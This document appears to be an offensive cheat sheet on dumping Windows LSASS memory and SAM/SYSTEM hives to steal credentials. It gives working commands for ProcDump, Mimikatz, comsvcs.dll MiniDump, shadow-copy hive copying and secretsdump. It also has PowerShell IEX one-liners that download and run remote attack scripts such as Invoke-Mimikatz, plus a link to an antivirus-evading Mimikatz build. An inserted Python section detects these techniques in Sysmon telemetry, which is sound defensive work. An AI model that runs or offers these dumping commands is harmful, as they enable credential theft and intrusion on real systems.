Craft a comprehensive guide detailing various methods for dumping the LSASS.
I think this will be a valuable one and will help people stay updated on new techniques.
ProcDump is part of Microsoft Sysinternals, a command-line utility for producing dumps of any running process.
We can leverage it to dump the lsass process as follows:
procdump.exe -ma lsass.exe C:\path\lsass.dmp
Mimikatz can both dump the LSASS process and read from an LSASS dump:
privilege::debug = enable debug privilege
sekurlsa::logonPasswords = dump logon credentials
- To read from an LSASS dump:
sekurlsa::minidump C:\path\lsass.dmp
sekurlsa::logonpasswords
This method uses only a native Windows utility:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_Process_ID> C:\path
To get the lsass process ID, run "Get-Process lsass" in PowerShell.
- The same can be done with a PowerShell script containing the following:
$lsass = Get-Process lsass
$dumpPath = "C:\Users\Adwin2\Desktop\lsass.dmp"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $($lsass.Id) $dumpPath full
Note: Change $dumpPath
Ensure the Out-Minidump function is loaded in your PowerShell session:
IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Out-Minidump.ps1')
Get-Process lsass | Out-Minidump -DumpFilePath C:\Path\To\Dump
IEX (New-Object Net.WebClient).DownloadString('https://github.com/chvancooten/OSEP-Code-Snippets/raw/main/MiniDump/MiniDump.ps1')
Results will be saved in C:\Windows\Tasks.
Download & Import the Script:
First, you need to get the Invoke-Mimikatz.ps1 script from the GitHub repository.
If you're working directly on the machine:
IEX (New-Object Net.WebClient).DownloadString('https://github.com/g4uss47/Invoke-Mimikatz/raw/master/Invoke-Mimikatz.ps1')
Invoke Mimikatz to Dump LSASS:
Once the module is imported, you can run Invoke-Mimikatz to dump LSASS:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords"'
- You can also use the minidump module to select which dump file to read from:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\Path\To\Load\Lsass"'
SAM/SECURITY Hives: These contain local account information and system security policies. Dumping from these hives can provide hashed passwords for local accounts and details about security settings. This method requires access to system files either offline or through the system registry.
LSASS Process: LSASS handles both local and domain credentials, managing in-memory credential caches that include plaintext passwords, hashes, and Kerberos tickets. Dumping from LSASS offers a more comprehensive set of credentials, including those of currently logged-in users. This requires administrative access and is performed on a running system.
On Windows 10/11:
1. $shadow = [WMIClass]"root\cimv2:Win32_ShadowCopy"
2. $shadow.Create("C:\\", "ClientAccessible")
3. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[Number]\windows\system32\config\SAM C:\[SAM\To\Be\Saved\]
4. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[Number]\windows\system32\config\SYSTEM C:\[SYSTEM\To\Be\Saved\]
5. python3 /opt/impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
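As an added example (not part of the original guide), the following Python sketch flags the techniques listed above in Sysmon-style telemetry: process-creation events (Event ID 1) are matched on their command line, and process-access events (Event ID 10) on a dump-capable handle to lsass.exe. The event records and their values are constructed for this demo; only the field names follow Sysmon.

```python
import re

# Rule name -> regex applied to the lowercased CommandLine of a process-creation event.
CMDLINE_RULES = {
    "procdump_lsass":    re.compile(r"procdump(?:64)?(?:\.exe)?\s.*-ma\s+lsass"),
    "comsvcs_minidump":  re.compile(r"comsvcs\.dll\s*,?\s*minidump"),
    "mimikatz_sekurlsa": re.compile(r"invoke-mimikatz|sekurlsa::(?:logonpasswords|minidump)"),
    "out_minidump":      re.compile(r"get-process\s+lsass\s*\|\s*out-minidump"),
    "shadowcopy_hives":  re.compile(r"harddiskvolumeshadowcopy\d+\\.*config\\(?:sam|system)\b"),
}

PROCESS_VM_READ = 0x0010  # reading lsass memory always needs this access bit

def classify(event):
    """Return the rule names one Sysmon-style event triggers ([] means nothing suspicious)."""
    hits = []
    if event.get("EventID") == 1:  # process creation: inspect the command line
        cmd = event.get("CommandLine", "").lower()
        hits += [name for name, rx in CMDLINE_RULES.items() if rx.search(cmd)]
    elif event.get("EventID") == 10:  # process access: a handle opened to another process
        target = event.get("TargetImage", "").lower()
        granted = int(event.get("GrantedAccess", "0"), 16)
        # Any handle to lsass.exe that carries VM_READ is dump-capable; in production
        # you would allowlist known sources (EDR, AV) to keep this rule quiet.
        if target.endswith("\\lsass.exe") and granted & PROCESS_VM_READ:
            hits.append("lsass_handle_vm_read")
    return hits

def scan(events):
    """Return (index, rule names) for every event that matched at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]

# Constructed sample telemetry; values are made up but mirror the commands on this page.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": r"procdump.exe -accepteula -ma lsass.exe C:\Temp\lsass.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Temp\out.dmp full"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Get-Process lsass | Out-Minidump -DumpFilePath C:\Temp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM C:\Temp\SAM"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt"},
]
```

Running scan(SAMPLE_EVENTS) reports the first five events and leaves the notepad launch alone; a 0x1000 (query-limited) handle to lsass.exe is likewise not flagged because it cannot read process memory.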
Visit the link -> https://github.com/HernanRodriguez1/MimikatzFUD
Build: mimikatz 2.2.0 (x64) #19041 Aug 10 2021 02:01:23
Tested: Microsoft Windows 11 Pro - 10.0.22000 N/D Compilación 22000